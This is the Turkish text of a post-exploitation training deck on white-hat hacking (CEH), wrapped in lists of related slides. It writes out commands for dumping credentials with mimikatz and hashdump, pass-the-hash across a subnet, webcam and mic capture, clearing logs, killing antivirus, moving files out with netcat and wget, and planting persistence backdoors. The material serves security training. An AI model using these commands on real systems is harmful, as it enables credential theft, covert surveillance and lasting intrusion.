W3af ile Web Uygulama Güvenlik Testleri – IIBGA Cyber Security
 
Cryptospot kullanım kılavuzu (v1.6.0)
Cryptospot   kullanım kılavuzu (v1.6.0)Cryptospot   kullanım kılavuzu (v1.6.0)
Cryptospot kullanım kılavuzu (v1.6.0)Neyasis Technology
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ BGA Cyber Security
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıBGA Cyber Security
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...CypSec - Siber Güvenlik Konferansı
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Murat KARA
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMABGA Cyber Security
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux Burak Oğuz
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıBGA Cyber Security
 
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiMetasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiFatih Ozavci
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ BGA Cyber Security
 
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...BGA Cyber Security
 

Similar to Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması (20)

Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit AşamasıBeyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
Beyaz Şapkalı Hacker CEH Eğitimi - Exploit Aşaması
 
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet KeşfiBeyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
Beyaz Şapkalı Hacker CEH Eğitimi - Zafiyet Keşfi
 
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma SaldırılarıBeyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
Beyaz Şapkalı Hacker CEH Eğitimi - Parola Kırma Saldırıları
 
Bilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği MetasploitBilgi Sistemleri Güvenliği Metasploit
Bilgi Sistemleri Güvenliği Metasploit
 
W3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – IIW3af ile Web Uygulama Güvenlik Testleri – II
W3af ile Web Uygulama Güvenlik Testleri – II
 
Cryptospot kullanım kılavuzu (v1.6.0)
Cryptospot   kullanım kılavuzu (v1.6.0)Cryptospot   kullanım kılavuzu (v1.6.0)
Cryptospot kullanım kılavuzu (v1.6.0)
 
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
LINUX, WINDOWS VE AĞ SİSTEMLERİ SIZMA TESTLERİ
 
Windows Hacking 2
Windows Hacking 2Windows Hacking 2
Windows Hacking 2
 
Sızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage KullanımıSızma Testlerinde Armitage Kullanımı
Sızma Testlerinde Armitage Kullanımı
 
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
Emre Tınaztepe - FileLocker Zararlıları (Çalışma Mantıkları ve Analiz Yönteml...
 
Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-Siber Guvenlik ve Etik Hhacking -2-
Siber Guvenlik ve Etik Hhacking -2-
 
SIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMASIZMA TESTLERİNDE BİLGİ TOPLAMA
SIZMA TESTLERİNDE BİLGİ TOPLAMA
 
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux 2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
2010 Kocaeli Linux Günleri - Linux Güvenlik UygulamalarıLinux
 
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme ÇalışmalarıWindows İşletim Sistemi Yetki Yükseltme Çalışmaları
Windows İşletim Sistemi Yetki Yükseltme Çalışmaları
 
Web Hacking
Web HackingWeb Hacking
Web Hacking
 
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim RehberiMetasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
Metasploit Framework - Giris Seviyesi Guvenlik Denetim Rehberi
 
Holynix v1
Holynix v1Holynix v1
Holynix v1
 
WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ WEB ve MOBİL SIZMA TESTLERİ
WEB ve MOBİL SIZMA TESTLERİ
 
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
BTRisk Zararlı Yazılım Analizi Eğitimi Sunumu - Bölüm 1
 
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
IstSec'14 - Çağrı ERSEN - Açık Kaynak Sistemlerle Siber Saldırı Gözetleme Sis...
 

More from PRISMA CSI

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log ToplamaPRISMA CSI
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPRISMA CSI
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPRISMA CSI
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPRISMA CSI
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)PRISMA CSI
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPRISMA CSI
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi MetodolojileriPRISMA CSI
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?PRISMA CSI
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciPRISMA CSI
 

More from PRISMA CSI (10)

Sysmon ile Log Toplama
Sysmon ile Log ToplamaSysmon ile Log Toplama
Sysmon ile Log Toplama
 
Practical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post ExploitationPractical White Hat Hacker Training - Post Exploitation
Practical White Hat Hacker Training - Post Exploitation
 
Practical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - ExploitationPractical White Hat Hacker Training - Exploitation
Practical White Hat Hacker Training - Exploitation
 
Practical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability DetectionPractical White Hat Hacker Training - Vulnerability Detection
Practical White Hat Hacker Training - Vulnerability Detection
 
Practical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information GatheringPractical White Hat Hacker Training - Active Information Gathering
Practical White Hat Hacker Training - Active Information Gathering
 
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)Practical White Hat Hacker Training -  Passive Information Gathering(OSINT)
Practical White Hat Hacker Training - Passive Information Gathering(OSINT)
 
Practical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber SecurityPractical White Hat Hacker Training - Introduction to Cyber Security
Practical White Hat Hacker Training - Introduction to Cyber Security
 
Sızma Testi Metodolojileri
Sızma Testi MetodolojileriSızma Testi Metodolojileri
Sızma Testi Metodolojileri
 
Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?Sızma (Penetrasyon) Testi Nedir?
Sızma (Penetrasyon) Testi Nedir?
 
Kaynak Kod Analiz Süreci
Kaynak Kod Analiz SüreciKaynak Kod Analiz Süreci
Kaynak Kod Analiz Süreci
 

Beyaz Şapkalı Hacker CEH Eğitimi - Post Exploit Aşaması

  • 1. www.prismacsi.com © All Rights Reserved. 1 Uygulamalı Beyaz Şapkalı Hacker Eğitimi Bu doküman, alıntı vererek kullanılabilir ya da paylaşılabilir ancak değiştirilemez ve ticari amaçla kullanılamaz. Detaylı bilgiye https://creativecommons.org/licenses/by-nc-nd/4.0/legalcode.tr bağlantısından erişebilirsiniz.
  • 2. www.prismacsi.com © All Rights Reserved. 2 Post Exploitation
  • 3. www.prismacsi.com © All Rights Reserved. 3 Konular • Domain Exploitation • Meterpreter • Crackmapexec • Empire • Local Privilege Escalation • Persistence • Pivoting
  • 4. www.prismacsi.com © All Rights Reserved. 4 Domain Exploitation • Active Directory Nedir?
  • 5. www.prismacsi.com © All Rights Reserved. 5 Domain Exploitation • Tüm sistemlere sızabilmek için: • Zafiyetler kullanılarak hedef sistemlere sızılır ve kullanıcı yada oturum bilgileri toplanır. • Bruteforce ataklar sayesinde sistemlere sızılır. • Sistemler üzerindeki detaylı bilgi içeren dosyalar ile ek sistemlere sızma girişimleri denenir. • Sonuç olarak bir noktada Domain Admin’e giden yol açılır. • Kontrol artık sende!
  • 6. www.prismacsi.com © All Rights Reserved. 6 Domain Exploitation • Bir Windows sisteme sızıldığında genellikle; • SAM ve SYSTEM dosyaları ele geçirilir. • %WINDIR%system32configSAM • %WINDIR%system32configSYSTEM • Samdump2 ile hashler elde edilir. • Veya metasploit oturumu üzerinden hashdump çalıştırılır. • Elde edilen hashler kırılır ya da pass-the-hash yöntemi ile tüm networkte denenir.
  • 7. www.prismacsi.com © All Rights Reserved. 7 Mimikatz - Uygulama • Mimikatz ile hafızadan açık metin parolalar elde edilebilir. • https://github.com/gentilkiwi/mimikatz • mimikatz # privilege::debug • mimikatz # sekurlsa::logonpasswords
  • 8. www.prismacsi.com © All Rights Reserved. 8 Tarayıcı Parolaları • Metasploit üzerinde birçok tarayıcı modülü bulunmakta. • run post/windows/gather/enum_chrome • run post/multi/gather/firefox_creds • git clone https://github.com/Unode/firefox_decrypt.git • Nirsoft yazılımları kullanılabilir • https://www.nirsoft.net/utils/web_browser_password.html
  • 9. www.prismacsi.com © All Rights Reserved. 9 MS14-068 Zafiyeti • Domain Admin yetkisine erişimi sağlayan kritik seviye bir zafiyettir. • Kerberos zafiyeti • PyKEK scripti ile kolayca exploit edilebilir. (https://github.com/mubix/pykek )
  • 10. www.prismacsi.com © All Rights Reserved. 10 Meterpreter • Metasploit içerisinde yer alan gelişmiş bir payloaddır ve manuel olarak gerçekleştirilebilecek bir çok işlemi post exploitleri sayesinde hızlıca çözümleyebilir. • Superman olarak düşünülebilir. • Post exploitation adımının vazgeçilmezidir.
  • 11. www.prismacsi.com © All Rights Reserved. 11 Post Exploitation • Exploit sonrası işlemler • Hedef sisteme özel araştırma teknikleri • Parola özetlerini elde etme adımları • Konfigürasyon dosyalarını tespit etme • Domain kullanıcılarını tespit etme ve aksiyon • Bellekten parolaların elde edilmesi • Envanter çıkarımı
  • 12. www.prismacsi.com © All Rights Reserved. 12 Post Exploitation - Uygulama • Meterpreter Temel Komutları • sysinfo – Sistem hakkında bilgi almak için kullanılır • background – Sessionı arka plana atmak için kullanılır • getuid – uid bilgisini almak için kullanılır • upload – sisteme dosya yüklemek için kullanılır • download – sistemden dosya çekmek için kullanılır
  • 13. www.prismacsi.com © All Rights Reserved. 13 Post Exploitation - Uygulama • Meterpreter Temel Komutları • screenshot – Ekran görüntüsü almak için kullanılır • ps – çalışan processleri listelemek için kullanılır • migrate – çalışan bir process’e bağlanarak kalıcılık sağlamak için kullanılır • getsystem – sistemde yetki yükseltmek için kullanılır
  • 14. www.prismacsi.com © All Rights Reserved. 14 Post Exploitation - Uygulama • Meterpreter Temel Komutları • Hashdump – kullanıcı bilgilerinin hashini almak için kullanılır • run hashdump – hashdump post exploiti çalıştırılır • record_mic – ses kaydı almak için kullanılır • webcam_snip 1 – sistem üzerinde bir webcam var ise aktifleştirilir ve görüntü alınır.
  • 15. www.prismacsi.com © All Rights Reserved. 15 Post Exploitation - Uygulama • Meterpreter ile hedef sistemin ağ trafiğini dinleme • use sniffer diyerek sniffer ı aktifleştirebilirsiniz. • sniffer_interfaces - interfaceleri görüntüleme. • sniffer_start 3- 3 nolu interface için paket kaydı yapma. • sniffer_dump 3 /tmp/dump.pcap – 3 nolu interface için alınan trafik kaydını kayıt etme
  • 16. www.prismacsi.com © All Rights Reserved. 16 Post Exploitation - Uygulama • Meterpreter Diğer Komutlar • enum_firefox – Firefox browserı eğer sistemde yüklüyse veri çekmek için kullanılır • clearev – logları silmek için kullanılır • killav – antivirüsleri kapatmak için kullanılır • run get_application_list – sistemde yüklü uygulamaları listeler • run hostedit -e 10.0.1.5,facebook.com – Hocam facebook hesaplarını nasıl hacklerim? J • enable_rdp – RDP servisini aktifleştirmek için kullanılır.
  • 17. www.prismacsi.com © All Rights Reserved. 17 Post Exploitation - Uygulama • Meterpreter Post Exploit Kullanımı • run post/<TAB> • use post/windows/gather/enum_domain – Domain enumeration için kullanılır. • run post/windows/gather/enum_applications – Sistemde yüklü uygulamaları keşfet • run post/windows/gather/credentials/winscp – Sistemde yüklü winscp uygulamasından parolaları çıkar
  • 18. www.prismacsi.com © All Rights Reserved. 18 Post Exploitation - Uygulama • Yetki yükseltme için kullanılabilecek komutlar • getsystem – Sistemde NT AUTHORITYSystem yetkilerine erişim için bir yol varsa, bu yolu kullanarak sizi en yetkili kullanıcı yapar. • bypass_uac – UAC ‘ı aşmak için kullanılır.
  • 19. www.prismacsi.com © All Rights Reserved. 19 Post Exploitation - Uygulama • Meterpreter özel modüller • incognito – candır <3 • use incognito – incognito modülünü aktifleştirir • list_tokens – sistemde var olan tokenları listeler • impersonate_token – tokenları üstünüze almanıza olanak sağlar • Domain Admin tokenı yakaladığınızda incognito ile bu yetkiye sıçrayabilirsiniz.
  • 20. www.prismacsi.com © All Rights Reserved. 20 Post Exploitation • Empire, PowerShell ve Python kullanan bir post- exploitation aracıdır. • Esnek ve kriptolu güvenlik yapısıyla hedef sistemlerde post-exploitation aşamasında kullanılacak modüller barındırır. • Eğer sistemde antivirus gibi bir önlem kullanılıyorsa PowerShell kullandığı için bunların güvenlik engellerine de takılmadan hareket eder.
  • 21. www.prismacsi.com © All Rights Reserved. 21 Post Exploitation • Empire üç farklı özellik barındırır. • Biz de bunları ve içerisinde bulunan modülleri kullanarak post-exploitation işlemini gerçekleştiririz. • Bunlar: • Listeners • Stagers • Agents
  • 22. www.prismacsi.com © All Rights Reserved. 22 Post Exploitation • İlk yapacağımız şey Metasploit’te olduğu gibi Empire üzerinden shell alabilmek için bir listener başlatmak olmalı. • listeners komutu ile listeners menüsüne giriyoruz ve aynı zamanda aktif olan tüm listenerlar liste olarak sunuluyor. • Listener’ımızı seçip ayarlarını yaptıktan sonra execute komutu ile listenerımızı aktif hale getiriyoruz.
  • 23. www.prismacsi.com © All Rights Reserved. 23 Empire - Uygulama
  • 24. www.prismacsi.com © All Rights Reserved. 24 Post Exploitation • Empire aracı, listener açıldıktan sonra ona bağlantıyı gönderecek ve listener’ın hedef sisteme bağlanmasını sağlayacak çeşitli stagerlar bulundurur. • usestager <tab> komutu ile uygun stagerlar listelenir ve işimize yarayan seçilerek konfigüre edildikten sonra execute komutu ile çalıştırılır.
  • 25. www.prismacsi.com © All Rights Reserved. 25 Empire - Uygulama
  • 26. www.prismacsi.com © All Rights Reserved. 26 Empire - Uygulama
  • 27. www.prismacsi.com © All Rights Reserved. 27 Post Exploitation • Listener başlatılıp stager hedef sistemde çalıştırıldıktan sonra, agents modülünden hedef sistemde açılan bağlantı uyarısı alınır. • agents komutu ile menüye gidilir. • Açılan bağlantıyı aktif hale getirmek için interact <bağlantı-ismi> komutu kullanılır.
  • 28. www.prismacsi.com © All Rights Reserved. 28 Empire - Uygulama
  • 29. www.prismacsi.com © All Rights Reserved. 29 Post Exploitation - CME • Crackmapexec (CME) • İsviçre çakısı gibi bir araç • İçerisinde network tabanlı ataklarınızı hızlandıracak birçok özellik mevcut. • Tek komutla tüm networkte pass the hash saldırısı yapıp içeride var olan tokenları, mimikatz ile memory dumpları vs alabilirsiniz.
  • 30. www.prismacsi.com © All Rights Reserved. 30 Post Exploitation – CME – Uygulama • Bir kullanıcı adı ve parola ile tüm networkü tarayabilirsiniz. • crackmapexec smb 10.0.1.0/24 -u Administrator-p Password123! • Pass the Hash saldırısı yapabilirsiniz. • crackmapexec smb 10.0.1.0/24 -u Administrator -H E52CAC67419A9A2238F10713B629B565:64F12CDDAA88057E06A81B54E73B949 • Sızabildiğiniz tüm sistemlerde mimikatz çalıştırabilirsiniz. • crackmapexec smb 192.168.1.1/24 -u Administrator -p Password123! -M mimikatz
  • 31. www.prismacsi.com © All Rights Reserved. 31 Post Exploitation – Dosya Transferi • Bir sisteme sızıldığında dosya transferi yapmak için elinizin altında meterpreter gibi yetenekli bir ajan olmayabilir. Sahip olduğunuz shell içerisinde dosya transferi için aşağıdaki komutlardan faydalanabiliriz. • Python 2 ile: • Servis ayaklandırma : python -m SimpleHTTPServer 8000 • Client ile çekme : wget http://10.0.1.5:8000/dosya • Python 3 ile: • Servis ayaklandırma : python –m http.server 8000 • Client ile çekme : wget http://10.0.1.5:8000/dosya
  • 32. www.prismacsi.com © All Rights Reserved. 32 Post Exploitation – Dosya Transferi • Apache servisini kendi makinenizde ayaklandırarak da dosya transferi yapabilirsiniz. • Fakat dikkat! Eğer çalıştırdığı bir dil varsa (örn: php) raw içerik alamazsınız. • Servisi başlat : service apache2 start • Client ile çek : wget http://10.0.1.5 • PHP ile de yapılabilir. • Servisi başlat : php -S 0.0.0.0:8000 • Client ile çek : wget http://10.0.1.5:8000
  • 33. www.prismacsi.com © All Rights Reserved. 33 Post Exploitation – Dosya Transferi • Hacklediğiniz sistem Windows ise? • bitsadmin kullanabilirsiniz. • bitsadmin /transfer n http://domain/file c:%homepath%file • nc ile de yine dosya transferi yapılabilir. Hedef sisteme eğer içerisinde nc binarysi yoksa yüklenir ve öyle çalıştırılır. • nc –l 1337 > dosya • nc 10.0.1.6 1337 < dosya • nc’nin sürüme göre farklı kullanım yöntemleri bulunmaktadır. Örneğin port belirtinken bazı sürümler –p parametresini de isteyebilir. nc –l –p 1337 gibi.
  • 34. www.prismacsi.com © All Rights Reserved. 34 Yetki Yükseltme Saldırıları • Sistemde birden fazla yetki grubu mevcut. • Linux ve MacOS için root, Windows için Administrator kullanıcısı en yetkili kullanıcıdır. • Yetki yükseltme saldırıları ile birlikte herhangi bir kullanıcının, yetki kullanıcı yetkilerine erişmesi mümkündür. • Local Exploitler!
  • 35. www.prismacsi.com © All Rights Reserved. 35 Yetki Yükseltme Saldırıları • Neden ihtiyaç duyarız? • Sistemdeki hassas dosyaları okuma ve üzerine yazabilme imkanı • Sistemde kalıcılık sağlayabilme • Sistemi tüm yetkilerle ele geçirme • Sistemi ileri seviye izleme
  • 36. www.prismacsi.com © All Rights Reserved. 36 Yetki Yükseltme Saldırıları • Linux Yetki Yükseltme Saldırı Tipleri • Kernel exploitleri • Root yetkisi ile çalışan servislerin exploit edilmesi • Suid-bit yetkisi olan Programların exploit edilmesi • sudo hakları olan kullanıcıların exploit edilmesi • Konfigurasyon hatası olan cron-job uygulamalarının exploit edilmesi
  • 37. www.prismacsi.com © All Rights Reserved. 37 Yetki Yükseltme Saldırıları • Kernel Exploitleri • Kernel exploitleri, Linux kernel’inde (çekirdeğinde) bulunan zafiyetleri kullanarak yükseltilmiş yetkilerle komut çalıştırılmasına izin veren programlardır. • Başarılı bir kernel exploiti genellikle kullanıcıya super user yetkileri (#root) ile komut çalıştırmasını sağlar. • Kernel exploitinin hedef sistemde çalışması için zafiyeti içeren kernel sürümünü kullanan bir makine ve bu exploiti hedef sisteme atabileceğimiz bir bağlantımız olması gerekmekte, en son aşama olarak hedef sisteme atılan exploiti çalıştırabiliyor olmamız gerekmektedir.
  • 38. www.prismacsi.com © All Rights Reserved. 38 Yetki Yükseltme Saldırıları • UYARI! • Kernel exploitleri her zaman en son çare olarak kullanılmalıdır. Çünkü internette bulunan exploitlerin tamamının stable olmamasından dolayı exploit çalıştırılan sistem crash olabilir ve çalıştırılan exploit hedef sistemde yakalanmaya sebebiyet verecek iz ve loglar bırakabilir.
  • 39. www.prismacsi.com © All Rights Reserved. 39 Yetki Yükseltme Saldırıları
  • 40. www.prismacsi.com © All Rights Reserved. 40 Yetki Yükseltme Saldırıları • Root yetkisi ile çalışan servislerin exploit edilmesi • Root yetkisi ile çalışan herhangi bir servisi exploit etmek her zaman root shelli ile sonuçlanır. Bu yüzden sisteminizde çalışan servisleri her zaman kontrol etmeli, root yetkisi ile çalışıp çalışmadığına bakmalı ve gerekmiyorsa root yetkisi ile çalıştırmamalısınız.
  • 41. www.prismacsi.com © All Rights Reserved. 41 Yetki Yükseltme Saldırıları
  • 42. www.prismacsi.com © All Rights Reserved. 42 Yetki Yükseltme Saldırıları • SUID Bit Exploit • SUID (Set User ID), bir programın belirtilen user yetkileri ile çalıştırılmasına yarayan bir Linux özelliğidir. Örnek olarak ping komutu network socketleri açabilmesi için her zaman root yetkileri ile çalışmalıdır. Bu yüzden kurulu olduğu herhangi bir sistemde otomatik olarak root kullanıcısının yetkileri ile suid izni vardır. Böylece her kullanıcı ping komutunu kullanabilir.
  • 43. www.prismacsi.com © All Rights Reserved. 43 Yetki Yükseltme Saldırıları
  • 44. www.prismacsi.com © All Rights Reserved. 44 Yetki Yükseltme Saldırıları
  • 45. www.prismacsi.com © All Rights Reserved. 45 Yetki Yükseltme Saldırıları • Sudo Hakkı Exploit Edilmesi • Herhangi bir sudo kullanıcısına erişildiyse bundan sonra kullanıcının sudo hakları kullanılarak herhangi bir komut root yetkisi ile çalıştırılabilir.
  • 46. www.prismacsi.com © All Rights Reserved. 46 Yetki Yükseltme Saldırıları
  • 47. www.prismacsi.com © All Rights Reserved. 47 Yetki Yükseltme Saldırıları • Cronjob Exploit • Cron-job olarak çalışan bir script veya binary yazılabilir ise bu script veya binary üzerinde düzenleme yaparak root shelli elde edebiliriz.
  • 48. www.prismacsi.com © All Rights Reserved. 48 Yetki Yükseltme Saldırıları
  • 49. www.prismacsi.com © All Rights Reserved. 49 Yetki Yükseltme Saldırıları • Tavsiyeler • Hedef sistemde ilk önce LinEnum gibi sistemde tarama yaparak bize bilgi verecek scriptler kullanmak kolaylık sağlayabilir. • Bazı kullanıcıların credentialları bilgisayarda herhangi bir klasörde .txt dosyası halinde tuttukları daha önceden görüldüğü için, hedef sistemi kapsamlı bir şekilde aramak iyi bir adımdır. • Credentialların bulunması halinde yetki yükseltmek için uğraşmaya gerek kalmayabilir.
  • 50. www.prismacsi.com © All Rights Reserved. 50 Yetki Yükseltme Saldırıları • Windows Yetki Yükseltme Saldırı Tipleri • Windows Kernel Exploit • Meterpreter ile Migrate • Depolanmış Credentiallar • Domain Exploitation
  • 51. www.prismacsi.com © All Rights Reserved. 51 Yetki Yükseltme Saldırıları
  • 52. www.prismacsi.com © All Rights Reserved. 52 Yetki Yükseltme Saldırıları • Hedef sistemde otomatik olarak tarama yaparak patchlenmemiş zafiyetleri gösterir.
  • 53. www.prismacsi.com © All Rights Reserved. 53 Yetki Yükseltme Saldırıları • Hedef sistemde otomatik olarak tarama yaparak bulunan zafiyetleri gösterir.
  • 54. www.prismacsi.com © All Rights Reserved. 54 Yetki Yükseltme Saldırıları • Bu modül ile hedef sistemde bulunan kullanıcıların parolalarının hashlerini ele geçirebiliriz.
  • 55. www.prismacsi.com © All Rights Reserved. 55 Yetki Yükseltme Saldırıları • Bu modül ile hedef sistemde Administrator kullanıcı yetkileri ile çalışan herhangi bir process’e geçiş yaparak yetki yükseltebiliriz.
  • 56. www.prismacsi.com © All Rights Reserved. 56 Yetki Yükseltme Saldırıları • Privesc_Check Scripti • https://github.com/pentestmonkey/windows-privesc-check
  • 57. www.prismacsi.com © All Rights Reserved. 57 Persistence / Kalıcılık • Persistence, hedef sistemde shell aldıktan sonra sistemdeki varlığımızı kalıcı hale getiren yöntemlere denir. Bu herhangi bir script olabilir, çalışan bir process’e gömülmüş bir backdoor olabilir. Gerisi hacker’ın hayal gücüne kalmıştır.
  • 58. www.prismacsi.com © All Rights Reserved. 58 Persistence / Kalıcılık • Teknikler - Backdoor • Backdoorlar akla gelen ilk ve en kolay yöntemlerdir. • İnternet aleminde çok fazla alternatifi bulunabilir. • Olumsuz yanı çok kolay tespit edilebilmesidir.
  • 59. www.prismacsi.com © All Rights Reserved. 59 Persistence / Kalıcılık • Teknikler - Direct Code Injection • Çalışan uygulamalara zarar vermeden zararlı kodu ekleme işlemidir. • Yeni bir uygulama çalıştırılmadığı, sadece çalışan bir uygulamaya enjekte edildiği için tespit edilmesi neredeyse imkansızdır. • Olumsuz yanı sistem reboot edildiğinde kaybolur.
  • 60. www.prismacsi.com © All Rights Reserved. 60 Persistence / Kalıcılık • Metasploit – Persistence Modülü • Hedef sistemde meterpreter shell aldıktan sonra run persistence komutu gerekli ayarları eklenerek çalıştırılır. Böylece metasploit otomatik olarak sisteme bir backdoor yerleştirir. Daha sonra belirtilen IP adresi ver porttan istenildiği zaman shell alınabilir.
  • 61. www.prismacsi.com © All Rights Reserved. 61 Persistence / Kalıcılık
  • 62. www.prismacsi.com © All Rights Reserved. 62 Persistence / Kalıcılık • s4u_persistence modülü • Zamanlanmış bir görev oluşturur ve bu zamanlanmış görev sayesinde her zaman shell alınabilir.
  • 63. www.prismacsi.com © All Rights Reserved. 63 Persistence / Kalıcılık • registry_persistence modülü • Bu modül boot sırasında çalıştırılan bir payload oluşturur ve sisteme gömer. Böylece sistem her reboot edildiğinde payload çalışır ve shell alınabilir.
  • 64. www.prismacsi.com © All Rights Reserved. 64 Persistence / Kalıcılık • Netcat Kullanımı • Netcat, TCP/IP protokolünü kullanarak dosya okuma ve yazmaya yarayan network aracıdır. Hedef sistemde kalıcılık sağlamak için kullanılabilir. • İlk önce nc.exe dosyası hedef sisteme upload edilir.
